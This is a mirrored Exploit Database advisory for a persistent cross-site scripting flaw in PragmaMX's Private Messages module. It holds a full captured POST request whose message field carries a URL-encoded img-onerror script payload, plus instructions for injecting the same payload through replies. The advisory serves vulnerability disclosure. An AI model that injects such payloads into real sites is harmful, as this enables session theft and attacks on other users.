PragmaMX 1.2.10 – Persistent Cross-Site Scripting

• Exploit Database
• 12 阅读

• 作者： HauntIT
  日期： 2012-01-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18439/

• # TITLE ... # Persistent XSS in PragmaMX 1.12.0 for logged in users#
  # DATE .... # 30.01.2012 .......................................... #
  # AUTOHR .. # http://hauntit.blogspot.com ................ #
  # SOFT LINK # http://www.pragmamx.org ............................. #
  # VERSION . # 1.12.0 .............................................. #
  # TESTED ON # LAMP ................................................ #
  #...................................................................#
  
  # 1. What is this?
  # 2. What is the type of vulnerability?
  # 3. Where is bug :)
  # 4. More...
  
  #............................................#
  # 1. What is this?
   "pragmaMx - the fast CMS". :)
  You should try it!
  
  # 2. What is the type of vulnerability?
   This is persistent cross-site scripting for authenticated users.
  
  Vulnerability exists in "Private Messages".
  Here I present You sample HTTP traffic (from BurpProxy).
  
  ...cut...
  POST /pragmaMx_1.12.0/html/modules.php?name=Private_Messages HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101
  Firefox/9.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: pl,en-us;q=0.7,en;q=0.3
  Accept-Encoding: gzip, deflate
  Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
  Proxy-Connection: keep-alive
  Referer:
  http://pragmaMx_1.12.0/html/modules.php?name=Private_Messages&op=send
  Cookie: mxA9649D14D6AAF90E4A70576BF4ACC1=6db52d6de453f7a5890b36ebafd99fda;
  tab_ya_edituser=0; PHPSESSID=d7nhrjbs5i2pmjvo6vuj1hg2j1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 200
  
  name=Private_Messages&op=submit&to_user=adminek&subject=persistent+MSG&image=icon1.gif&message=hi%21%0D%0A%27%3E%3Cimg+src%3Dy+onerror%3Dalert%28%27i+am+watching+you%27%29%3B%3E&msg_id=0&submit=Submit
  ...cut...
  
  It depends on what code You will add to $message.
  Persistent XSS code could be added when You decide to reply, too.
  
  So click 'Reply' button, and as a $message parameter add Your XSS-code.
  
  # 3. Where is bug :)
  
  $message parameter in source code. We need (more) validation here. :)
  
  # 4. More...
  
  - http://www.pragmamx.org
  - http://hauntit.blogspot.com
  - http://www.google.com
  - http://portswigger.net
  
  # Best regards
  #